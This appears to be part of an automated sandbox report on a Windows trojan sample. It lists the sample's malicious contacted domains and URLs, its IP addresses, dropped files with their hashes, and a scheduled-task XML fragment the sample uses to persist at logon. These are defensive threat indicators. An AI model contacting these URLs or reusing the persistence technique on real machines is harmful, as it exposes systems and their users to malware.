            http://www.somethingyourselves.com/n2hm/?bN=9gwJr9Ib0rEc+KDTQOrHkeZIL+750DWB0cIboGlmlHlNjyJ/Euut2Sz1G3s+yPgqLfhiB/VwLZOXrNsbN5gXgWVJl9cnSs3fxA==&TpfpO=3fCD1To0u100%Avira URL Cloudmalware
            www.madamkikkiey.net/n2hm/100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.somethingyourselves.com
            		103.193.185.8
            		truetrue
              		unknown
              www.alrt.info
              		80.92.205.131
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.somethingyourselves.com/n2hm/?bN=9gwJr9Ib0rEc+KDTQOrHkeZIL+750DWB0cIboGlmlHlNjyJ/Euut2Sz1G3s+yPgqLfhiB/VwLZOXrNsbN5gXgWVJl9cnSs3fxA==&TpfpO=3fCD1To0utrue
                • Avira URL Cloud: malware
                		unknown
                www.madamkikkiey.net/n2hm/true
                • Avira URL Cloud: malware
                		low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabcmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.drfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.fontbureau.comSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359450288.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.sajatypeworks.comivSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.311383849.0000000005D9B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://duckduckgo.com/ac/?q=17089-7.17.drfalse
                          		high
                          http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icocmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.drfalse
                              		high
                              http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.founder.com.cSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.313238837.0000000005D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://search.yahoo.com?fr=crmas_sfpfcmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.drfalse
                                  		high
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=17089-7.17.drfalse
                                    		high
                                    http://www.tiro.comSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.drfalse
                                      		high
                                      http://www.fontbureau.com/designersSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.goodfont.co.krSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=cmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.drfalse
                                          		high
                                          http://www.carterandcone.comlSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.311383849.0000000005D9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://ac.ecosia.org/autocomplete?q=17089-7.17.drfalse
                                            		high
                                            https://search.yahoo.com?fr=crmas_sfpcmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.drfalse
                                              		high
                                              http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://fontfabrik.comSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.founder.com.cn/cnSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.313238837.0000000005D88000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/frere-user.htmlSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.comoSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359450288.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers8SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.fonts.comSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.sandoll.co.krSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.urwpp.deDPleaseSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.zhongyicts.com.cnSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.361866159.0000000003151000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.390890604.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.sajatypeworks.comeSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.311383849.0000000005D9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.sakkal.comSecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=17089-7.17.drfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          103.193.185.8
                                                          		www.somethingyourselves.comHong Kong
                                                          		45382EHOSTIDC-AS-KREHOSTICTKRtrue

                                                          General Information

                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                          Analysis ID:755940
                                                          Start date and time:2022-11-29 10:40:48 +01:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 11m 25s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:20
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@21/12@2/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:
                                                          • Successful, ratio: 8.3% (good quality ratio 7.7%)
                                                          • Quality average: 65.2%
                                                          • Quality standard deviation: 27.3%
                                                          HCA Information:
                                                          • Successful, ratio: 96%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          10:41:52API Interceptor1x Sleep call for process: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe modified
                                                          10:41:57API Interceptor59x Sleep call for process: powershell.exe modified
                                                          10:41:59Task SchedulerRun new task: FqJXaFxwEj path: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          10:42:13API Interceptor1x Sleep call for process: FqJXaFxwEj.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASNs

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FqJXaFxwEj.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.355304211458859
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.355304211458859
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):21856
                                                          Entropy (8bit):5.597980730393762
                                                          Encrypted:false
                                                          SSDEEP:384:ttCRLq0UNVQruXgFseVSjnWjulrItGiJ9gVSJ3uyV1xm0ZOAVrdTs0c8A+iRYg:rXgToWClrSmVcu6Lng
                                                          MD5:84C44110AE1D79E1CAF451F6E381CEE6
                                                          SHA1:1A92B2ABA0161D4DD3C807D665E08E25C8DD6E99
                                                          SHA-256:D0024E0C27DC567BD3601940C8653CED465C588B384F4D9794338015D5E83D1B
                                                          SHA-512:7DF5287755D2600CE7B42487AEE31331AE78A06709076FC9C03DC6985B447F7CD3A102757D7B1746A009CD7315E0928F1DEF0338F1A5C92A76AAEB7BFCD3B263
                                                          Malicious:false
                                                          Preview:@...e...........................y...8.n..............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                          C:\Users\user\AppData\Local\Temp\17089-7

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2880737026424216
                                                          Encrypted:false
                                                          SSDEEP:192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
                                                          MD5:5F02C426BCF0D3E3DC81F002F9125663
                                                          SHA1:EA50920666E30250E4BE05194FA7B3F44967BE94
                                                          SHA-256:DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
                                                          SHA-512:53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44oebsyr.ko3.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview:1

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4searmeq.c02.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview:1

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ab3likgp.3hk.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview:1

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kuw1e3h0.ro1.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview:1

                                                          C:\Users\user\AppData\Local\Temp\tmp4724.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1597
                                                          Entropy (8bit):5.151490154385564
                                                          Encrypted:false
                                                          SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtazxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTkv
                                                          MD5:936AEB32A643A82E85DFCB00D9B2AA81
                                                          SHA1:B9EAB79BC7BF79BB7097BA973F1DED9D0917D91F
                                                          SHA-256:BC771042757EC4CFD44ACEF348DB5FB4069AC67AFB5D63C67D89D05F69B29012
                                                          SHA-512:E1C7CD33F0591756621BFC30035B07A34EE870749023BD71979D7C9DBD019E96E09CD66E17366891018BF3A43FAC0DDD1C55FD16D7880E0F840BB309344464B3
                                                          Malicious:true
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                                          C:\Users\user\AppData\Local\Temp\tmp8C7A.tmp

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1597
                                                          Entropy (8bit):5.151490154385564
                                                          Encrypted:false
                                                          SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtazxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTkv
                                                          MD5:936AEB32A643A82E85DFCB00D9B2AA81
                                                          SHA1:B9EAB79BC7BF79BB7097BA973F1DED9D0917D91F
                                                          SHA-256:BC771042757EC4CFD44ACEF348DB5FB4069AC67AFB5D63C67D89D05F69B29012
                                                          SHA-512:E1C7CD33F0591756621BFC30035B07A34EE870749023BD71979D7C9DBD019E96E09CD66E17366891018BF3A43FAC0DDD1C55FD16D7880E0F840BB309344464B3
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                                          C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):914944
                                                          Entropy (8bit):7.637536160349333
                                                          Encrypted:false
                                                          SSDEEP:12288:0cAqU+IQ+9ex4JzGcE3mcN553siNii9+M7SJNlMQ8LYbm8fv+/nFRDdzoa1cfN:dB+NdrE3mID3hlnSZMQ8UP+/FRDdEPf
                                                          MD5:55D6460392408D1325C18B69A91C28E3
                                                          SHA1:405847D03BE406A0025EDA76852DFD46420A8D7A
                                                          SHA-256:D1E9780A620DDF149C2AED319388BCA7ED690C2A58C9FFC8F60B1C4515115DC9
                                                          SHA-512:D0795DBF40D938EF236EF04A21836A95B49357D7A8F627E346BCACE64E36EF8E3399C110D49FA5153F232938D0C5ACFA197F8FBBA9A15EA3BC50945287703C10
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 29%
